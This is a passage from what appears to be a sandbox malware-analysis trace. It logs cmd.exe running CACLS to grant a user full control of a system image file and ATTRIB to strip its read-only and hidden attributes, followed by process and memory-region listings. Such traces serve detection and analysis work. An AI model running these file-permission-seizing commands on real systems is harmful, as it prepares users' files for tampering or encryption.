-17 [0191.628] _wcsicmp (_String1="CACLS", _String2="COPY") returned -14 [0191.628] _wcsicmp (_String1="CACLS", _String2="CD") returned -3 [0191.628] _wcsicmp (_String1="CACLS", _String2="CHDIR") returned -7 [0191.628] _wcsicmp (_String1="CACLS", _String2="RENAME") returned -15 [0191.628] _wcsicmp (_String1="CACLS", _String2="REN") returned -15 [0191.628] _wcsicmp (_String1="CACLS", _String2="ECHO") returned -2 [0191.628] _wcsicmp (_String1="CACLS", _String2="SET") returned -16 [0191.628] _wcsicmp (_String1="CACLS", _String2="PAUSE") returned -13 [0191.628] _wcsicmp (_String1="CACLS", _String2="DATE") returned -1 [0191.628] _wcsicmp (_String1="CACLS", _String2="TIME") returned -17 [0191.628] _wcsicmp (_String1="CACLS", _String2="PROMPT") returned -13 [0191.628] _wcsicmp (_String1="CACLS", _String2="MD") returned -10 [0191.628] _wcsicmp (_String1="CACLS", _String2="MKDIR") returned -10 [0191.628] _wcsicmp (_String1="CACLS", _String2="RD") returned -15 [0191.628] _wcsicmp (_String1="CACLS", _String2="RMDIR") returned -15 [0191.628] _wcsicmp (_String1="CACLS", _String2="PATH") returned -13 [0191.628] _wcsicmp (_String1="CACLS", _String2="GOTO") returned -4 [0191.628] _wcsicmp (_String1="CACLS", _String2="SHIFT") returned -16 [0191.628] _wcsicmp (_String1="CACLS", _String2="CLS") returned -11 [0191.628] _wcsicmp (_String1="CACLS", _String2="CALL") returned -9 [0191.628] _wcsicmp (_String1="CACLS", _String2="VERIFY") returned -19 [0191.628] _wcsicmp (_String1="CACLS", _String2="VER") returned -19 [0191.628] _wcsicmp (_String1="CACLS", _String2="VOL") returned -19 [0191.628] _wcsicmp (_String1="CACLS", _String2="EXIT") returned -2 [0191.628] _wcsicmp (_String1="CACLS", _String2="SETLOCAL") returned -16 [0191.629] _wcsicmp (_String1="CACLS", _String2="ENDLOCAL") returned -2 [0191.629] _wcsicmp (_String1="CACLS", _String2="TITLE") returned -17 [0191.629] _wcsicmp (_String1="CACLS", _String2="START") returned -16 [0191.629] _wcsicmp (_String1="CACLS", _String2="DPATH") 
returned -1 [0191.629] _wcsicmp (_String1="CACLS", _String2="KEYS") returned -8 [0191.629] _wcsicmp (_String1="CACLS", _String2="MOVE") returned -10 [0191.629] _wcsicmp (_String1="CACLS", _String2="PUSHD") returned -13 [0191.629] _wcsicmp (_String1="CACLS", _String2="POPD") returned -13 [0191.629] _wcsicmp (_String1="CACLS", _String2="ASSOC") returned 2 [0191.629] _wcsicmp (_String1="CACLS", _String2="FTYPE") returned -3 [0191.629] _wcsicmp (_String1="CACLS", _String2="BREAK") returned 1 [0191.629] _wcsicmp (_String1="CACLS", _String2="COLOR") returned -14 [0191.629] _wcsicmp (_String1="CACLS", _String2="MKLINK") returned -10 [0191.629] _wcsicmp (_String1="CACLS", _String2="DIR") returned -1 [0191.629] _wcsicmp (_String1="CACLS", _String2="ERASE") returned -2 [0191.629] _wcsicmp (_String1="CACLS", _String2="DEL") returned -1 [0191.629] _wcsicmp (_String1="CACLS", _String2="TYPE") returned -17 [0191.629] _wcsicmp (_String1="CACLS", _String2="COPY") returned -14 [0191.629] _wcsicmp (_String1="CACLS", _String2="CD") returned -3 [0191.629] _wcsicmp (_String1="CACLS", _String2="CHDIR") returned -7 [0191.629] _wcsicmp (_String1="CACLS", _String2="RENAME") returned -15 [0191.629] _wcsicmp (_String1="CACLS", _String2="REN") returned -15 [0191.629] _wcsicmp (_String1="CACLS", _String2="ECHO") returned -2 [0191.629] _wcsicmp (_String1="CACLS", _String2="SET") returned -16 [0191.629] _wcsicmp (_String1="CACLS", _String2="PAUSE") returned -13 [0191.629] _wcsicmp (_String1="CACLS", _String2="DATE") returned -1 [0191.629] _wcsicmp (_String1="CACLS", _String2="TIME") returned -17 [0191.629] _wcsicmp (_String1="CACLS", _String2="PROMPT") returned -13 [0191.629] _wcsicmp (_String1="CACLS", _String2="MD") returned -10 [0191.629] _wcsicmp (_String1="CACLS", _String2="MKDIR") returned -10 [0191.629] _wcsicmp (_String1="CACLS", _String2="RD") returned -15 [0191.629] _wcsicmp (_String1="CACLS", _String2="RMDIR") returned -15 [0191.629] _wcsicmp (_String1="CACLS", _String2="PATH") 
returned -13 [0191.629] _wcsicmp (_String1="CACLS", _String2="GOTO") returned -4 [0191.629] _wcsicmp (_String1="CACLS", _String2="SHIFT") returned -16 [0191.629] _wcsicmp (_String1="CACLS", _String2="CLS") returned -11 [0191.629] _wcsicmp (_String1="CACLS", _String2="CALL") returned -9 [0191.629] _wcsicmp (_String1="CACLS", _String2="VERIFY") returned -19 [0191.629] _wcsicmp (_String1="CACLS", _String2="VER") returned -19 [0191.629] _wcsicmp (_String1="CACLS", _String2="VOL") returned -19 [0191.629] _wcsicmp (_String1="CACLS", _String2="EXIT") returned -2 [0191.629] _wcsicmp (_String1="CACLS", _String2="SETLOCAL") returned -16 [0191.629] _wcsicmp (_String1="CACLS", _String2="ENDLOCAL") returned -2 [0191.629] _wcsicmp (_String1="CACLS", _String2="TITLE") returned -17 [0191.630] _wcsicmp (_String1="CACLS", _String2="START") returned -16 [0191.630] _wcsicmp (_String1="CACLS", _String2="DPATH") returned -1 [0191.630] _wcsicmp (_String1="CACLS", _String2="KEYS") returned -8 [0191.630] _wcsicmp (_String1="CACLS", _String2="MOVE") returned -10 [0191.630] _wcsicmp (_String1="CACLS", _String2="PUSHD") returned -13 [0191.630] _wcsicmp (_String1="CACLS", _String2="POPD") returned -13 [0191.630] _wcsicmp (_String1="CACLS", _String2="ASSOC") returned 2 [0191.630] _wcsicmp (_String1="CACLS", _String2="FTYPE") returned -3 [0191.630] _wcsicmp (_String1="CACLS", _String2="BREAK") returned 1 [0191.630] _wcsicmp (_String1="CACLS", _String2="COLOR") returned -14 [0191.630] _wcsicmp (_String1="CACLS", _String2="MKLINK") returned -10 [0191.630] _wcsicmp (_String1="CACLS", _String2="FOR") returned -3 [0191.630] _wcsicmp (_String1="CACLS", _String2="IF") returned -6 [0191.630] _wcsicmp (_String1="CACLS", _String2="REM") returned -15 [0191.630] _wcsnicmp (_String1="CACL", _String2="cmd ", _MaxCount=0x4) returned -12 [0191.630] SetErrorMode (uMode=0x0) returned 0x0 [0191.630] SetErrorMode (uMode=0x1) returned 0x0 [0191.630] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, 
lpBuffer=0x221e98, lpFilePart=0x18f1bc | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x18f1bc*="Desktop") returned 0x18 [0191.630] SetErrorMode (uMode=0x0) returned 0x1 [0191.630] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0191.630] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0191.635] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0191.636] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CACLS.*", fInfoLevelId=0x1, lpFindFileData=0x18ef38, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18ef38) returned 0xffffffff [0191.636] GetLastError () returned 0x2 [0191.636] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CACLS", fInfoLevelId=0x1, lpFindFileData=0x18ef38, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18ef38) returned 0xffffffff [0191.636] GetLastError () returned 0x2 [0191.636] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\CACLS.*", fInfoLevelId=0x1, lpFindFileData=0x18ef38, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18ef38) returned 0x222180 [0191.636] FindClose (in: hFindFile=0x222180 | out: hFindFile=0x222180) returned 1 [0191.637] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.COM", fInfoLevelId=0x1, lpFindFileData=0x18ef38, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18ef38) returned 0xffffffff [0191.637] GetLastError () returned 0x2 [0191.637] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.EXE", fInfoLevelId=0x1, lpFindFileData=0x18ef38, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: 
lpFindFileData=0x18ef38) returned 0x222180 [0191.637] FindClose (in: hFindFile=0x222180 | out: hFindFile=0x222180) returned 1 [0191.637] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0191.637] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0191.637] GetConsoleTitleW (in: lpConsoleTitle=0x18f430, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0191.637] InitializeProcThreadAttributeList (in: lpAttributeList=0x18f2b8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x18f380 | out: lpAttributeList=0x18f2b8, lpSize=0x18f380) returned 1 [0191.637] UpdateProcThreadAttribute (in: lpAttributeList=0x18f2b8, dwFlags=0x0, Attribute=0x60001, lpValue=0x18f378, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x18f2b8, lpPreviousValue=0x0) returned 1 [0191.637] GetStartupInfoW (in: lpStartupInfo=0x18f274 | out: lpStartupInfo=0x18f274*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0191.637] lstrcmpW (lpString1="\\cacls.exe", lpString2="\\XCOPY.EXE") returned -1 [0191.638] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cacls.exe", lpCommandLine="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile43.bmp\" /E /G EEBsYm5:F /C ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x18f314*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile43.bmp\" /E /G EEBsYm5:F /C ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, 
dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18f360 | out: lpCommandLine="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile43.bmp\" /E /G EEBsYm5:F /C ", lpProcessInformation=0x18f360*(hProcess=0x50, hThread=0x4c, dwProcessId=0xa54, dwThreadId=0x9b0)) returned 1 [0191.641] CloseHandle (hObject=0x4c) returned 1 [0191.641] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0191.641] GetEnvironmentStringsW () returned 0x220308* [0191.641] FreeEnvironmentStringsW (penv=0x220308) returned 1 [0191.641] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0191.751] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x18f254 | out: lpExitCode=0x18f254*=0x0) returned 1 [0191.751] CloseHandle (hObject=0x50) returned 1 [0191.751] _vsnwprintf (in: _Buffer=0x18f39c, _BufferCount=0x13, _Format="%08X", _ArgList=0x18f260 | out: _Buffer="00000000") returned 8 [0191.751] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0191.751] GetEnvironmentStringsW () returned 0x222410* [0191.751] FreeEnvironmentStringsW (penv=0x222410) returned 1 [0191.751] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0191.752] GetEnvironmentStringsW () returned 0x222410* [0191.752] FreeEnvironmentStringsW (penv=0x222410) returned 1 [0191.752] DeleteProcThreadAttributeList (in: lpAttributeList=0x18f2b8 | out: lpAttributeList=0x18f2b8) [0191.752] GetConsoleTitleW (in: lpConsoleTitle=0x18f69c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0191.752] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0191.752] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 
[0191.752] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0191.752] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x18ef38, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18ef38) returned 0xffffffff [0191.753] GetLastError () returned 0x2 [0191.753] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ATTRIB", fInfoLevelId=0x1, lpFindFileData=0x18ef38, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18ef38) returned 0xffffffff [0191.753] GetLastError () returned 0x2 [0191.753] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x18ef38, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18ef38) returned 0x21e4d8 [0191.753] FindClose (in: hFindFile=0x21e4d8 | out: hFindFile=0x21e4d8) returned 1 [0191.753] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x18ef38, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18ef38) returned 0xffffffff [0191.753] GetLastError () returned 0x2 [0191.753] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x18ef38, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18ef38) returned 0x21e4d8 [0191.753] FindClose (in: hFindFile=0x21e4d8 | out: hFindFile=0x21e4d8) returned 1 [0191.753] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0191.753] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0191.753] GetConsoleTitleW (in: lpConsoleTitle=0x18f430, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0191.753] InitializeProcThreadAttributeList (in: lpAttributeList=0x18f2b8, dwAttributeCount=0x1, 
dwFlags=0x0, lpSize=0x18f380 | out: lpAttributeList=0x18f2b8, lpSize=0x18f380) returned 1 [0191.753] UpdateProcThreadAttribute (in: lpAttributeList=0x18f2b8, dwFlags=0x0, Attribute=0x60001, lpValue=0x18f378, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x18f2b8, lpPreviousValue=0x0) returned 1 [0191.753] GetStartupInfoW (in: lpStartupInfo=0x18f274 | out: lpStartupInfo=0x18f274*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0191.754] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0191.754] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile43.bmp\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x18f314*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile43.bmp\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18f360 | out: lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile43.bmp\"", lpProcessInformation=0x18f360*(hProcess=0x4c, hThread=0x50, dwProcessId=0xa74, dwThreadId=0xac0)) returned 1 [0191.756] CloseHandle (hObject=0x50) returned 1 [0191.756] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 
[0191.756] GetEnvironmentStringsW () returned 0x222410* [0191.756] FreeEnvironmentStringsW (penv=0x222410) returned 1 [0191.756] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0191.826] GetExitCodeProcess (in: hProcess=0x4c, lpExitCode=0x18f254 | out: lpExitCode=0x18f254*=0x0) returned 1 [0191.826] CloseHandle (hObject=0x4c) returned 1 [0191.827] _vsnwprintf (in: _Buffer=0x18f39c, _BufferCount=0x13, _Format="%08X", _ArgList=0x18f260 | out: _Buffer="00000000") returned 8 [0191.827] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0191.827] GetEnvironmentStringsW () returned 0x222410* [0191.827] FreeEnvironmentStringsW (penv=0x222410) returned 1 [0191.827] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0191.827] GetEnvironmentStringsW () returned 0x222410* [0191.827] FreeEnvironmentStringsW (penv=0x222410) returned 1 [0191.827] DeleteProcThreadAttributeList (in: lpAttributeList=0x18f2b8 | out: lpAttributeList=0x18f2b8) [0191.827] _get_osfhandle (_FileHandle=1) returned 0x7 [0191.827] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0191.827] _get_osfhandle (_FileHandle=1) returned 0x7 [0191.827] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0191.827] _get_osfhandle (_FileHandle=0) returned 0x3 [0191.827] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0191.827] SetConsoleInputExeNameW () returned 0x1 [0191.828] GetConsoleOutputCP () returned 0x1b5 [0191.828] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0191.828] SetThreadUILanguage (LangId=0x0) returned 0x409 [0191.828] exit (_Code=0) Process: id = "430" image_name = "cacls.exe" filename = "c:\\windows\\system32\\cacls.exe" page_root = "0x7ea16c20" os_pid = "0xa54" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "429" 
os_parent_pid = "0x954" cmd_line = "CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile43.bmp\" /E /G EEBsYm5:F /C " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 28147 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 28148 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 28149 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 28150 start_va = 0x150000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 28151 start_va = 0x820000 end_va = 0x828fff entry_point = 0x820000 region_type = mapped_file name = "cacls.exe" filename = "\\Windows\\System32\\cacls.exe" (normalized: "c:\\windows\\system32\\cacls.exe") Region: id = 28152 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 28153 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 28154 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = 
pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 28155 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 28156 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 28157 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 28158 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 28159 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 28160 start_va = 0xf0000 end_va = 0xfffff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 28161 start_va = 0x2b0000 end_va = 0x3affff entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 28162 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 28163 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 28164 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 28165 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file 
name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 28166 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 28167 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 28168 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Thread: id = 619 os_tid = 0x9b0 Thread: id = 620 os_tid = 0xa94 Process: id = "431" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16d80" os_pid = "0xa74" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "429" os_parent_pid = "0x954" cmd_line = "ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile43.bmp\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 28169 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 28170 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 28171 start_va = 0x40000 end_va = 
0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 28172 start_va = 0x190000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 28173 start_va = 0xfa0000 end_va = 0xfa6fff entry_point = 0xfa0000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 28174 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 28175 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 28176 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 28177 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 28178 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 28179 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 28180 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 28181 start_va = 0x70000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 28182 start_va = 0x1d0000 end_va = 0x236fff entry_point = 0x1d0000 region_type = mapped_file name = "locale.nls" filename = 
"\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 28183 start_va = 0x260000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x0000000000260000" filename = "" Region: id = 28184 start_va = 0x6dea0000 end_va = 0x6debcfff entry_point = 0x6dea0000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 28185 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 28186 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 28187 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 28188 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 28189 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = 